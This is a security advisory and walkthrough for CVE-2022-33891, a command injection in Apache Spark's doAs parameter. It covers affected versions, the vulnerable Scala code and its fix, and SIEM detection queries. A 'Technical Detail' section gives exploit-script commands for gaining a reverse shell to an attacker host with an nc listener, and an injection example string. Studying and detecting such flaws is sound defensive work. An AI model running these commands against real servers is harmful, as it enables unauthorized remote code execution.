Apache Zero Days: Apache Spark Command Injection Vulnerability (CVE-2022-33891)

vsociety

7 min read · Apr 27, 2024

by Mudassar Zafar

Component Name:

Apache Spark

Affected Versions:

Apache Spark ≤3.0.3

3.1.1≤ Apache Spark ≤3.1.2

3.2.0≤ Apache Spark ≤3.2.1

Vulnerability Type:

Command Injection

CVSSv3:

Base Score: 8.8 (High)

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

User Interaction: None

Confidentiality Impact: High

Integrity Impact: High

Availability Impact: High
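
The base score can be sanity-checked against the listed metrics with the CVSS v3.1 base score formula. The following is a minimal Python sketch for the unchanged-scope case only; the function and table names are illustrative, and the weights are the standard CVSS v3.1 values for each metric letter.

```python
import math

# CVSS v3.1 weights (scope unchanged) for the metric values relevant here.
WEIGHTS = {
    "AV": {"N": 0.85},
    "AC": {"L": 0.77},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as defined by the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(av, ac, pr, ui, c, i, a):
    """Compute the CVSS v3.1 base score for an unchanged-scope vector."""
    cia = WEIGHTS["CIA"]
    iss = 1 - (1 - cia[c]) * (1 - cia[i]) * (1 - cia[a])
    impact = 6.42 * iss
    exploitability = (
        8.22 * WEIGHTS["AV"][av] * WEIGHTS["AC"][ac] * WEIGHTS["PR"][pr] * WEIGHTS["UI"][ui]
    )
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("N", "L", "L", "N", "H", "H", "H"))
    print(base_score("N", "L", "N", "N", "H", "H", "H"))
```

Under this formula, Privileges Required: Low reproduces the 8.8 base score, while Privileges Required: None with the same remaining metrics would give 9.8.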

Remediation Solutions:

Check the Component Version:

Run the spark-shell command. The version information is displayed in the startup banner.
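
Once the version string is known, it can be compared against the affected ranges listed above. The following is a small Python sketch of that comparison; the helper names are hypothetical, and the ranges are copied from the "Affected Versions" list in this article.

```python
import re

# Inclusive (low, high) ranges taken from the "Affected Versions" list above.
AFFECTED_RANGES = [
    ((0, 0, 0), (3, 0, 3)),
    ((3, 1, 1), (3, 1, 2)),
    ((3, 2, 0), (3, 2, 1)),
]


def parse_version(text):
    """Extract the leading major.minor.patch triple from a version string."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if match is None:
        raise ValueError("unrecognized version string: %r" % text)
    return tuple(int(part) for part in match.groups())


def is_affected(version_text):
    """Return True if the version falls inside one of the listed ranges."""
    version = parse_version(version_text)
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


if __name__ == "__main__":
    for candidate in ("2.4.8", "3.1.2", "3.2.1", "3.2.2", "3.3.0"):
        print(candidate, is_affected(candidate))
```

Tuples compare element by element in Python, so no extra version-parsing library is needed for plain major.minor.patch strings.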

Apache Solution

Users can update their affected products to the latest version to fix the vulnerability:

https://spark.apache.org/downloads.html

How does it work?

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.

User-supplied commands are passed through the ?doAs parameter and nothing is reflected back on the page during execution, so this is a blind OS command injection. Your commands run, but the response gives no indication of whether they succeeded, or even whether the program you invoked exists on the target.

OS commands passed in the ?doAs URL parameter trigger a background Linux bash process: the cmdSeq sequence is executed as bash -c with the command line id -Gn followed by the supplied value. A bash process running id -Gn is therefore a good indicator that your server is vulnerable or has already been compromised.

If an attacker sends reverse shell commands, there is a high chance that the attacker's machine gains shell access to the Apache Spark server.

Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

Vulnerable component

http://<IP_address>/?doAs=`[command injection here]`

Vulnerable Method:

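private def getUnixGroups(username: String): Set[String] = {
    // Vulnerable (before the fix): username is concatenated into a "bash -c" command string
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
    // we need to get rid of the trailing "\n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    // Patched (PR 36315): the line above is replaced by a direct call to id, without a shell:
    // Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}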

This is a method definition in Scala for a private method named getUnixGroups. This method takes a single String argument called username and returns a Set of Strings that represent the groups that the user belongs to on a Unix-like system.

The method first constructs a Seq of Strings that represents a shell command to retrieve the user’s group information using the id command. The cmdSeq variable is set to this sequence, with the username parameter concatenated to the end of the command using string concatenation.

Next, the executeAndGetOutput method of the Utils object is called with cmdSeq as its argument. This method executes the shell command represented by the cmdSeq sequence and returns the output of the command as a string.

The output of the executeAndGetOutput method is then processed to remove the trailing newline character using the stripLineEnd method. The resulting string is then split into an array of strings using the split method and converted into a Set using the toSet method. This Set of strings represents the user’s group membership.
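
The post-processing step can be illustrated outside Spark. The following Python sketch mirrors the stripLineEnd, split and toSet chain on a sample id -Gn output; the function name and the sample group names are made up for illustration.

```python
def parse_unix_groups(raw_output):
    """Turn the raw output of `id -Gn <user>` into a set of group names.

    Approximates the Scala chain stripLineEnd.split(" ").toSet:
    drop the trailing line ending, split on spaces, deduplicate.
    """
    return set(raw_output.rstrip("\r\n").split(" "))


if __name__ == "__main__":
    # Sample output as `id -Gn` might print it for a hypothetical user.
    print(sorted(parse_unix_groups("spark adm sudo\n")))
```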

val cmdSeq = Seq("bash", "-c", "id -Gn " + username)

The getUnixGroups method constructs a shell command by concatenating the username parameter with the id command. The username parameter is not properly sanitized or validated, which means that an attacker could potentially inject malicious code into it and execute arbitrary commands on the underlying operating system.

For example, if an attacker were to supply a username parameter of “; echo hacked > /tmp/hacked”, the resulting shell command would be “id -Gn ; echo hacked > /tmp/hacked”. When this command is executed by the executeAndGetOutput method, it would execute the id command and then execute the echo command, which writes the string “hacked” to the file /tmp/hacked. This would give the attacker arbitrary code execution on the underlying operating system.
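
The difference between the vulnerable and the patched call can be sketched without running anything. The Python example below only builds the two argument vectors and tokenizes the bash -c script to show how a shell would split it; the helper names and the /usr/bin/id path are assumptions for illustration, not Spark code.

```python
import shlex


def vulnerable_argv(username):
    """Mirror of the vulnerable cmdSeq: the username becomes part of a shell script."""
    return ["bash", "-c", "id -Gn " + username]


def patched_argv(username, id_path="/usr/bin/id"):
    """Mirror of the patched call: no shell, the username is one argument to id."""
    return [id_path, "-Gn", username]


def shell_tokens(script):
    """Tokenize a script roughly the way a POSIX shell would, keeping operators."""
    lexer = shlex.shlex(script, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


if __name__ == "__main__":
    payload = "; echo hacked > /tmp/hacked"
    # The ';' shows up as a command separator, so bash sees two commands.
    print(shell_tokens(vulnerable_argv(payload)[2]))
    # Here the whole payload stays a single, inert argument to id.
    print(patched_argv(payload))
```

In the first case the separator and redirection are interpreted by bash; in the second there is no shell to interpret them, so id simply receives an unusual user name and fails to find it.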

Detection & Response:

The vulnerable code path is reachable when ACLs are enabled in the Spark UI (spark.acls.enable). In that configuration an attacker can supply an arbitrary user name through ?doAs and reach a permission check function that builds a Unix shell command from their input, which the system then executes. The result is arbitrary shell command execution with the privileges of the Spark process, potentially leading to complete compromise of the affected system.

Organizations using Apache Spark should be aware of CVE-2022-33891 and take steps to detect and respond to it.

One way to detect the vulnerability is to monitor for suspicious activity on the affected system. This can include monitoring for unexpected system or network behavior, such as unusual network traffic or system resource usage. It can also include monitoring for malicious activity, such as attempts to execute unauthorized code or access restricted resources.

Another way to detect the vulnerability is to use security tools and technologies, such as intrusion detection systems (IDS) and vulnerability scanners, to identify potential vulnerabilities and security issues on the system. These tools can help to identify and alert on potential security threats, allowing organizations to take appropriate action to mitigate the risk.

Once the vulnerability has been detected, it is important to take swift action to respond to the issue. This may include isolating the affected system to prevent further compromise, implementing temporary fixes or workarounds, and deploying a patch or update to address the issue. It is also important to conduct a thorough investigation to determine the root cause of the vulnerability and implement measures to prevent similar issues from occurring in the future.

Splunk:

index=* c-uri="*?doAs=`*"
index=* (Image="*\\bash" AND (CommandLine="*id -Gn*"))

Qradar:

SELECT UTF8(payload) from events where LOGSOURCENAME(logsourceid) ilike '%Linux%' and "Image" ilike '%\bash' and ("Process CommandLine" ilike '%id -Gn%')

SELECT UTF8(payload) from events where "URL" ilike '%?doAs=`%'

Elastic Query:

url.original:*?doAs\=`*
(process.executable:*\\bash AND process.command_line:*id\ \-Gn*)

Carbon Black:

(process_name:*\\bash AND process_cmdline:*id\ \-Gn*)

FireEye:

(process:`*\bash` args:`id -Gn`)

GrayLog:

(Image.keyword:*\\bash AND CommandLine.keyword:*id\ \-Gn*)
c-uri.keyword:*?doAs=`*

RSA Netwitness:

(web.page contains '?doAs=`')
((Image contains 'bash') && (CommandLine contains 'id -Gn'))

Logpoint:

(Image="*\\bash" CommandLine IN "*id -Gn*")
c-uri="*?doAs=`*"
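
Where no SIEM is available, the same URL-based check can be approximated with a short script over web access logs. The following Python sketch flags request URIs whose doAs value contains shell metacharacters; the function name and the metacharacter set are assumptions chosen for illustration and may need tuning for a given environment.

```python
from urllib.parse import parse_qs, urlsplit

# Characters that have special meaning to a shell; an assumed, non-exhaustive set.
SHELL_METACHARACTERS = set("`;|&$(){}<>\n")


def suspicious_doas_values(request_uri):
    """Return the decoded doAs values in a request URI that contain shell metacharacters."""
    query = urlsplit(request_uri).query
    values = parse_qs(query, keep_blank_values=True).get("doAs", [])
    return [v for v in values if any(ch in SHELL_METACHARACTERS for ch in v)]


if __name__ == "__main__":
    samples = [
        "/jobs/?doAs=alice",
        "/?doAs=%60id%60",
        "/?doAs=`sleep%205`",
    ]
    for uri in samples:
        print(uri, suspicious_doas_values(uri))
```

Because parse_qs URL-decodes the values, percent-encoded payloads such as %60 are caught as well as raw backticks.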

Technical Detail:

First, clone the exploit Python script from the GitHub repository to your local machine using the command below.

```
git clone https://github.com/devengpk/Apache-zero-days.git
```

With a self-hosted Apache Spark server up and running, check whether the target is vulnerable using the command below.

```
python3 exploit.py -u http://<server-ip> -p 8080 --check --verbose
```

The output of this command shows that the target is vulnerable.

Now let’s use the exploit to get a reverse shell with the command below.

```
python3 exploit.py -u http://<Server-IP> -p 8080 --revshell -lh <Attacker-IP> -lp 9001 --verbose
```

Before running the reverse shell command, start a netcat listener to catch the incoming connection using the command below.

```
nc -nvlp 9001
```

With the netcat listener running, execute the reverse shell command above. You will get a reverse shell and can run commands on the target server.

Reference:

● Exploitation payload: https://github.com/devengpk/Apache-zero-days
● Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

#Apache #Apache_Spark #CVE-2022-33891

The Apache Spark command injection vulnerability (CVE-2022-33891) was discovered by the Sangfor FarSight Labs team and reported to the Apache Spark project team on July 18, 2022. The vulnerability was classified as high severity, with a CVSS (Common Vulnerability Scoring System) Base Score of 8.8, indicating a high potential impact.